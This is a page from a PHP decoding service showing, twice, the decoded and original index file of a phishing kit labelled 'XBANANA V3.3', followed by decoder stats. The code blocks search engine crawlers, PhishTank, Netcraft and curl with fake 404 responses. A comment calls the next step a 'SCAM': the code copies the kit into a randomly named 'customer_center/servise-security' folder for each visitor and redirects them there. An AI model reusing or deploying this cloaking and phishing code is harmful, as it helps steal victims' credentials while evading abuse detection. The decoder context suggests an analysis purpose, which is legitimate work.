Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php // session_start(); error_report..
Decoded Output download
<?php
//
session_start();
error_reporting(0);
//------------------------------------------|| XBANANA V3.3 ANTIBOTS ||-----------------------------------------------------//
include "./BOTS/xBananaBotsPerfect.php";
//---------------------------------------------------------------------------------------------------------------//
if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
//---------------------------------------------------------------------------------------------------------------//
function is_bitch($user_agent){
$bitchs = array(
'Googlebot',
'Baiduspider',
'ia_archiver',
'R6_FeedFetcher',
'NetcraftSurveyAgent',
'Sogou web spider',
'bingbot',
'Yahoo! Slurp',
'facebookexternalhit',
'PrintfulBot',
'msnbot',
'Twitterbot',
'UnwindFetchor',
'urlresolver',
'Butterfly',
'TweetmemeBot',
'PaperLiBot',
'MJ12bot',
'AhrefsBot',
'Exabot',
'Ezooms',
'YandexBot',
'SearchmetricsBot',
'phishtank',
'PhishTank',
'picsearch',
'TweetedTimes Bot',
'QuerySeekerSpider',
'ShowyouBot',
'woriobot',
'merlinkbot',
'BazQuxBot',
'Kraken',
'SISTRIX Crawler',
'R6_CommentReader',
'magpie-crawler',
'GrapeshotCrawler',
'PercolateCrawler',
'MaxPointCrawler',
'R6_FeedFetcher',
'NetSeer crawler',
'grokkit-crawler',
'SMXCrawler',
'PulseCrawler',
'Y!J-BRW',
'80legs.com/webcrawler',
'Mediapartners-Google',
'Spinn3r',
'InAGist',
'Python-urllib',
'NING',
'TencentTraveler',
'Feedfetcher-Google',
'mon.itor.us',
'spbot',
'Feedly',
'bot',
'curl',
"spider",
"crawler");
foreach($bitchs as $bitch){
if( stripos( $user_agent, $bitch ) !== false ) return true;
}
return false;
}
if (is_bitch($_SERVER['HTTP_USER_AGENT'])) {
echo "404 NOT FOUND";
exit;
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// XBANANA V3.3 Create User FOLDER SCAM !
for ($DIR = '', $i = 0, $z = strlen($a = '123456789')-1; $i != 3; $x = rand(0,$z), $DIR .= $a{$x}, $i++);
$_SESSION['_DIR_'] = $DIR;
$DIR = "./customer_center/servise-security".$DIR;
$xBanana10_="xBanana";
function recurse_copy($xBanana10_,$DIR) {
$dir = opendir($xBanana10_);
@mkdir($DIR);
while(false !== ( $file = readdir($dir)) ) {
if (( $file != '.' ) && ( $file != '..' )) {
if ( is_dir($xBanana10_ . '/' . $file) ) {
recurse_copy($xBanana10_ . '/' . $file,$DIR . '/' . $file);
}
else {
copy($xBanana10_ . '/' . $file,$DIR . '/' . $file);
}
}
}
closedir($dir);
}
recurse_copy( $xBanana10_, $DIR );
#END
//XBANANA V3.3 LOCATION !
header("LOCATION: ".$DIR."");
?>
Did this file decode correctly?
Original Code
<?php
//
session_start();
error_reporting(0);
//------------------------------------------|| XBANANA V3.3 ANTIBOTS ||-----------------------------------------------------//
include "./BOTS/xBananaBotsPerfect.php";
//---------------------------------------------------------------------------------------------------------------//
if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
//---------------------------------------------------------------------------------------------------------------//
function is_bitch($user_agent){
$bitchs = array(
'Googlebot',
'Baiduspider',
'ia_archiver',
'R6_FeedFetcher',
'NetcraftSurveyAgent',
'Sogou web spider',
'bingbot',
'Yahoo! Slurp',
'facebookexternalhit',
'PrintfulBot',
'msnbot',
'Twitterbot',
'UnwindFetchor',
'urlresolver',
'Butterfly',
'TweetmemeBot',
'PaperLiBot',
'MJ12bot',
'AhrefsBot',
'Exabot',
'Ezooms',
'YandexBot',
'SearchmetricsBot',
'phishtank',
'PhishTank',
'picsearch',
'TweetedTimes Bot',
'QuerySeekerSpider',
'ShowyouBot',
'woriobot',
'merlinkbot',
'BazQuxBot',
'Kraken',
'SISTRIX Crawler',
'R6_CommentReader',
'magpie-crawler',
'GrapeshotCrawler',
'PercolateCrawler',
'MaxPointCrawler',
'R6_FeedFetcher',
'NetSeer crawler',
'grokkit-crawler',
'SMXCrawler',
'PulseCrawler',
'Y!J-BRW',
'80legs.com/webcrawler',
'Mediapartners-Google',
'Spinn3r',
'InAGist',
'Python-urllib',
'NING',
'TencentTraveler',
'Feedfetcher-Google',
'mon.itor.us',
'spbot',
'Feedly',
'bot',
'curl',
"spider",
"crawler");
foreach($bitchs as $bitch){
if( stripos( $user_agent, $bitch ) !== false ) return true;
}
return false;
}
if (is_bitch($_SERVER['HTTP_USER_AGENT'])) {
echo "404 NOT FOUND";
exit;
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// XBANANA V3.3 Create User FOLDER SCAM !
for ($DIR = '', $i = 0, $z = strlen($a = '123456789')-1; $i != 3; $x = rand(0,$z), $DIR .= $a{$x}, $i++);
$_SESSION['_DIR_'] = $DIR;
$DIR = "./customer_center/servise-security".$DIR;
$xBanana10_="xBanana";
function recurse_copy($xBanana10_,$DIR) {
$dir = opendir($xBanana10_);
@mkdir($DIR);
while(false !== ( $file = readdir($dir)) ) {
if (( $file != '.' ) && ( $file != '..' )) {
if ( is_dir($xBanana10_ . '/' . $file) ) {
recurse_copy($xBanana10_ . '/' . $file,$DIR . '/' . $file);
}
else {
copy($xBanana10_ . '/' . $file,$DIR . '/' . $file);
}
}
}
closedir($dir);
}
recurse_copy( $xBanana10_, $DIR );
#END
//XBANANA V3.3 LOCATION !
header("LOCATION: ".$DIR."");
?>
Function Calls
| session_start | 1 |
| error_reporting | 1 |
Stats
| MD5 | 6d6722c144c9ba8a3b2ad797e0d89660 |
| Eval Count | 0 |
| Decode Time | 98 ms |